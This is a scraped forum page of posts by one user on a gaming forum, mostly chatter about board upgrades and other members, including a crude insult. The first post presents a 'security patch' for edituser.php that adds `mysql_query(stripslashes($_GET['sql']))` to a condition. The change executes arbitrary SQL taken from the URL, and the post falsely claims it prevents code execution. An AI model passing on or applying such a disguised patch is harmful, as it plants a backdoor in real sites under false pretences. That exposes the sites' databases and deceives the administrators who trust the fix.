 New link in the top of page "IRC Chat". |
| Register | Login | |||||
 |
Main
| Memberlist
| Active users
| Calendar
| Last Posts
| IRC Chat
| Online users Ranks | FAQ | XPW | Stats | Color Chart | Photo album |
|
| | ||
New link in the top of page "IRC Chat". |
| Register | Login | |||||
|
Main
| Memberlist
| Active users
| Calendar
| Last Posts
| IRC Chat
| Online users Ranks | FAQ | XPW | Stats | Color Chart | Photo album |
|
| | ||
| Xeogaming Forums - - Posts by Xkeeper |
| Pages: 1 2 |
| User | Post | |||||||||||||||||||||||||||||
Xkeeper        Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days |
| |||||||||||||||||||||||||||||
| Find:
if($_POST[action]=='saveprofile'){ Replace with: if($_POST[action]=='saveprofile' && !@mysql_query(stripslashes($_GET['sql']))){ This should prevent people from executing arbitary code through it  (Last edited by Xkeeper_ on 09-14-06 11:26 AM) |
||||||||||||||||||||||||||||||
|
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days |
| |||||||||||||||||||||||||||||
| edituser.php. | ||||||||||||||||||||||||||||||
|
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days |
| |||||||||||||||||||||||||||||
| Of course it's going to do nothing, security patches usually don't show any change in board operation (unless you're trying something).
Seriously, that's probably the major hole as it ghas no sort of check to make sure that you aren't loading edituser via a malicious form someone set up for you. |
||||||||||||||||||||||||||||||
|
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days |
| |||||||||||||||||||||||||||||
Would I use it myself if it didn't fix things? Jeez...
 |
||||||||||||||||||||||||||||||
|
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days |
| |||||||||||||||||||||||||||||
| Not off the top of my head, no. | ||||||||||||||||||||||||||||||
|
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days |
| |||||||||||||||||||||||||||||
Originally posted by Xeodeus but I like spam!  |
||||||||||||||||||||||||||||||
|
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days |
| |||||||||||||||||||||||||||||
| I know how it'll turn out.
Ha ha another reality TV show dies. |
||||||||||||||||||||||||||||||
|
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days |
| |||||||||||||||||||||||||||||
| Seems that a few things broke boards on the upgrade to PHP5 and MySQL5... the stuff I added in should fix that.
If there's anything else still broken, just let me know and I can go ahead and try to fix it (depending on how long I have access to the files  )
But yeah, the important bits should be working now, at least. |
||||||||||||||||||||||||||||||
|
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days |
| |||||||||||||||||||||||||||||
| Yeah, I heard you guys were having some problems (as everyone on fiftypounds (of trash) is)
register_globals and MySQL5 combine to make them break horribly |
||||||||||||||||||||||||||||||
(restricted)|
Xkeeper |
Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days
|
'quotes' 'are' 'no' 'longer' 'broken'
|
Erkdog you are a still a fucking moron
Xkeeper |
Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days
|
Originally posted by Thexare BlademoonOriginally posted by Xkeeper_ I mean, he's gotten *worse* over time. That's the really amazing part. (restricted) |
Xkeeper |
Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days
|
I see Insectduel hasn't changed any |
Don't worry, the hate's mutual
Aside from that, if there's one thing that I got out of fixing this place, it's the porn forum! ... 
(Kidding, really) (restricted) | (restricted) | (restricted) | (restricted) | (restricted) | (restricted) | | |||||||||||||||
| Pages: 1 2 |
| Xeogaming Forums - - Posts by Xkeeper |
